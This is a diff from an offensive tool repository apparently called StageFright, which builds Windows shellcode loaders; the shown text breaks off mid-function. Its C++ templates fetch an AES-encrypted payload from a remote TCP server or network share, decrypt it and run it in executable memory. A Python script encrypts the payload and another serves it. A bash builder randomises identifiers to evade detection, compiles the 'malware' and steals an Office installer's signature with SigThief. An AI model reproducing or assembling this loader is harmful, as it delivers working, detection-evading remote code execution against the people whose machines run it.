+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCP/Resources/template.cpp

@@ -0,0 +1,160 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*mmsUbBZmpSL)();
+
+bool HSXaBzAEMsmM(const char* CSQpTfUWF, int qZHAiSObQH, const char* Random4, char*& ZqGOz, size_t& YcNnTdO) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(qZHAiSObQH);
+    serverAddress.sin_addr.s_addr = inet_addr(CSQpTfUWF);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize);
+
+    // Receive and save the binary data in a dynamically allocated buffer
+    ZqGOz = new char[fileSize];
+    if (ZqGOz == nullptr) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, ZqGOz + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            delete[] ZqGOz;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    YcNnTdO = totalSize;
+
+    return true;
+}
+
+int tgLHLotnCNGU(char* YCFvYJweWXpxv, unsigned int YCFvYJweWXpxv_len, char* DGQygzYiTL, size_t DGQygzYiTLlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)DGQygzYiTL, (DWORD)DGQygzYiTLlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, YCFvYJweWXpxv, &YCFvYJweWXpxv_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char DGQygzYiTL[] =  { 0x88, 0x86, 0x7, 0x50, 0x68, 0x8d, 0xb7, 0xfb, 0x11, 0xb7, 0xdd, 0x16, 0x93, 0x87, 0x14, 0x20 };;
+
+int main() {
+    const char* CSQpTfUWF = "192.168.1.12";  // Replace with the actual server IP
+    int qZHAiSObQH = 8080;               // Replace with the actual server port
+    const char* Random4 = "invoice.txt";  // Replace with the actual file path on the server
+
+    char* ZqGOz;
+    size_t YcNnTdO;
+
+    if (HSXaBzAEMsmM(CSQpTfUWF, qZHAiSObQH, Random4, ZqGOz, YcNnTdO)) {
+        tgLHLotnCNGU((char*)ZqGOz, YcNnTdO, DGQygzYiTL, sizeof(DGQygzYiTL));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, YcNnTdO, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            delete[] ZqGOz;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, ZqGOz, YcNnTdO);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, YcNnTdO, PAGE_EXECUTE_READ, &oldProtect)) {
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] ZqGOz;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        mmsUbBZmpSL zkPPzcyaB = reinterpret_cast<mmsUbBZmpSL>(executableMemory);
+
+        // Call the shellcode function
+        zkPPzcyaB();
+    } else {
+        return 1;
+    }
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -0,0 +1,189 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   _____ _____ ______                
+/  ___| |                     | | |_   _/  __ \| ___ \               
+\ `--.| |_ __ _  __ _  ___  __| |   | | | /  \/| |_/ /               
+ `--. \ __/ _` |/ _` |/ _ \/ _` |   | | | |    |  __/                
+/\__/ / || (_| | (_| |  __/ (_| |   | | | \__/\| |                   
+\____/ \__\__,_|\__, |\___|\__,_|   \_/  \____/\_|                   
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's Your Server IP?"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter Your Port"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCP/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCP/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCP/conv.py StageFright/TCP/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCP/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCP/Resources/con.py
+python3 StageFright/TCP/Resources/con.py
+#rm StageFright/TCP/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCP/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/PORTY/$PORTY/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCP/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCP/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCP/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCP/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCP/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCP/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCP/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCP/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCP/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCP/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCP/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCP/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCP/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCP/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/TCP/Resources/template.cpp -static-libgcc -static-libstdc++ -lws2_32 -lole32 -lwbemuuid -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+echo -e ${yellow}"***Edit And Run The TCP Server***"${clear}
+
+

StageFright/StageFright/StageFright/TCP/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/TCP/tcp_server.py

@@ -0,0 +1,69 @@
+import socketserver
+import os
+
+class MyHandler(socketserver.BaseRequestHandler):
+    def handle(self):
+        print("Connection received from:", self.client_address)
+
+        try:
+            # Receive file path length
+            path_len_bytes = self.request.recv(8)
+            if not path_len_bytes:
+                print("Error receiving file path length.")
+                return
+
+            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
+            print(f"Received file path length: {path_len}")
+
+            # Receive file path
+            file_path_bytes = b""
+            while len(file_path_bytes) < path_len:
+                received_data = self.request.recv(path_len - len(file_path_bytes))
+                if not received_data:
+                    print("Error receiving file path.")
+                    return
+                file_path_bytes += received_data
+
+            file_name = file_path_bytes.decode('utf-8')
+            print("Received file name:", file_name)
+
+            # Check if the file exists
+            file_path = os.path.join(os.getcwd(), file_name)
+            print("Absolute file path:", file_path)
+            if os.path.exists(file_path):
+                print("File found:", file_path)
+
+                # Read file data
+                with open(file_path, 'rb') as file:
+                    file_data = file.read()
+
+                # Print the size before sending
+                file_size = len(file_data)
+                print("Size of file:", file_size)
+
+                # Send file size to the client
+                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
+
+                # Send file data back to the client
+                self.request.sendall(file_data)
+                print("File data sent successfully.")
+
+            else:
+                print("File not found:", file_path)
+                self.request.sendall(b"FILE_NOT_FOUND")
+
+        except Exception as e:
+            print("Error:", str(e))
+            self.request.sendall(b"SERVER_ERROR")
+
+if __name__ == "__main__":
+    host, port = "192.168.1.12", 8080
+    server = socketserver.TCPServer((host, port), MyHandler)
+    print(f"Server listening on {host}:{port}")
+
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("Server shutting down.")
+        server.shutdown()
+

StageFright/StageFright/StageFright/TCP/template.cpp

@@ -0,0 +1,160 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize);
+
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+int main() {
+    const char* Random2 = "HOSTNAME";  // Replace with the actual server IP
+    int Random3 = PORTY;               // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";  // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            delete[] Random5;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        RandomB();
+    } else {
+        return 1;
+    }
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*HUUTjodrPVG)();
+
+bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(yprPDCUUPq);
+    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    GugJH = new char[fileSize];
+    if (GugJH == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] GugJH;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    ENUQBQQ = totalSize;
+    printf("Received data size: %zu\n", ENUQBQQ);
+
+    return true;
+}
+
+int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
